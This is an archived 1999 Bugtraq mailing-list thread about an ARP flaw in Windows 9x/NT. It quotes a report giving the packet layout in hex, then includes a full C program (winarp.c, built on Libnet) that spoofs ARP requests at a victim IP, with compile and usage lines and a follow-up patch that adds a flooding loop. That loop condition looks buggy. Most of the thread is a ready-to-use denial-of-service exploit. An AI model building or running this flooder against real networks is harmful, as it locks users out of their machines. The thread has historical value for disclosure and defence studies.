home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Freaks Macintosh Archive
/
Freaks Macintosh Archive.bin
/
Freaks Macintosh Archives
/
Textfiles
/
zines
/
Happle
/
happle10.sit.hqx
/
Happle#10
/
Files
/
Denial.sit
/
DoS
/
winarp.c
< prev
next >
Wrap
Internet Message Format
|
1999-04-16
|
7KB
Date: Tue, 13 Apr 1999 11:23:29 +0300
From: kay <kay@PHREEDOM.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: ARP problem in Windows9X/NT
Parts/Attachments:
1 Shown 71 lines Text
2 OK ~3.3 KB Text, ""
----------------------------------------
Hya,
Could you be more specific with those XX-fields ?
I started writing that proggie with plain syscalls, but it would only run
on Linux, so I modified one of the examples in Route's Libnet 0.9 to do
the stuff. I haven't tested it yes since I don't have LAN at home...
Compile with:
cc winarp.c -o winarp -lnet
Usage:
./winarp [-i device] [-c count] -d destination
For those who are still wondering what the hell Libnet is: check out
http://www.infonexus.com/~demon9
--
kay@phreedom.org
AD80 0D6A 5286 2729 5D2F 6326 D3F8 C61A 93F4 4C48 xuniL
DA FA 10 7D 6A 05 45 11 37 E1 E1 2B B4 34 2E 83 Zelur
On Mon, 12 Apr 1999, Joel Jacobson wrote:
> Hello all bugtraqers!
>
> I've found a problem in Windows9X/NT's way of handeling ARP packets.
>
> If you flood a computer at your LAN with the packet below, it's user
> will be forced to click a messagebox's OK button x times, where x is the number
> of packets you flooded with.
>
> I advice Microsoft to develope a patch for this problem, that let you
> choose to ignore all future messages of this type.
>
> There is no way to trace the flooder since the MAC address in the
> packet can be modified to anything. Bad configurated routers will
> not drop this packet. When I tested this problem on my LAN I could
> flood a computer on another C-net at my LAN without problems.
>
> The program NetXRay was used to preform the flood.
> The victims had to reboot their computer, or choose to click _very_
> many OK buttons.
>
> The ARP packet is build up like this:
>
> Ethernet Version II:
> Address: XX-XX-XX-XX-XX-XX --->FF-FF-FF-FF-FF-FF
> Ehternet II Protocol Type: ARP
> Address Resolution Protocol:
> Hardware Type: 1 (Ethernet)
> Protocol Type: 800
> Hardware Address: Length: 6
> Protocol Address: Length: 4
> Operations: ARP Request
> Source Hardware Address: XX-XX-XX-XX-XX-XX
> IP Source Address: <victim computer's IP>
> Destination Hardware Address: XX-XX-XX-XX-XX-XX
> IP Destination Address: <victim computer's IP>
>
> And in HEX the packet look like this:
> ff ff ff ff ff ff 00 00 00 00 00 00 08 06 08 00 06 04 00 01 00 00 00
> 00 00 00 XX XX XX XX 00 00 00 00 00 00 XX XX XX XX
> (XX is what matters here)
>
> Hope a patch for this problem will be developed fast, cause this is a
> big problem for my school and probably also to others.
>
> I'm not a C programmer, and don't know how to write an exploit for
> this problem. So, if anyone else can develope an exploit, feel free to do so.
>
> Joel Jacobson.
[ Part 2, "" Text/PLAIN (Name: "winarp.c") 71 lines. ]
/*
* Copyright (c) 1998, 1999 route|daemon9 <route@infonexus.com>
* All rights reserved.
*
* Modified to winarps.c 1999 by kay <kay@phreedom.org>
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#include <libnet.h>
u_char enet_src[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
u_long ip_dst = 0;
void send_arp(struct link_int *, u_char *);
#if (__linux__)
#define IPOPT_SECURITY 130
#endif
int main(int argc, char *argv[])
{
int c, count = 1;
char errbuf[256];
char *device = NULL;
char *address = NULL;
struct link_int *l;
while ((c = getopt(argc, argv, "i:d:c:")) != EOF) {
switch (c) {
case 'i':
device = optarg;
break;
case 'd':
address = optarg;
ip_dst = name_resolve(address, 0);
break;
case 'c':
count = atoi(optarg);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!device) {
fprintf(stderr, "Specify a device\n");
exit(EXIT_FAILURE);
}
if (!ip_dst) {
fprintf(stderr, "Specify destination\n");
exit(EXIT_FAILURE);
}
if ((l = open_link_interface(device, errbuf)) == NULL) {
fprintf(stderr, "open_link_interface: %s\n", errbuf);
exit(EXIT_FAILURE);
}
send_arp(l, device);
exit(EXIT_SUCCESS);
}
void send_arp(struct link_int *l, u_char * device)
{
int n;
u_char *buf;
buf = (u_char *) malloc(ARP_H + ETH_H);
if (!buf) {
perror("no packet memory");
exit(EXIT_FAILURE);
}
memset(buf, 0, ARP_H + ETH_H);
build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf);
build_arp(ARPHRD_ETHER, ETHERTYPE_IP, 6, 4, ARPOP_REQUEST, enet_src,
(void *)&ip_dst, enet_dst, (void *)&ip_dst, NULL, 0, buf + ETH_H);
n = write_link_layer(l, device, buf, ARP_H + ETH_H);
printf("Wrote %d byte ARP packet through linktype %d\n", n, l->linktype);
}
-----------------------------------------------------------------------------------
Date: Tue, 13 Apr 1999 12:13:17 +0300
From: kay <kay@PHREEDOM.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: ARP problem in Windows9X/NT
Forgot something:
In winarp.c
77 exit(EXIT_FAILURE);
78 }
+++ 79 for ( ; count <= 0; count--)
80 send_arp(l, device);
81 exit(EXIT_SUCCESS);
--
kay@phreedom.org
AD80 0D6A 5286 2729 5D2F 6326 D3F8 C61A 93F4 4C48 xuniL
DA FA 10 7D 6A 05 45 11 37 E1 E1 2B B4 34 2E 83 Zelur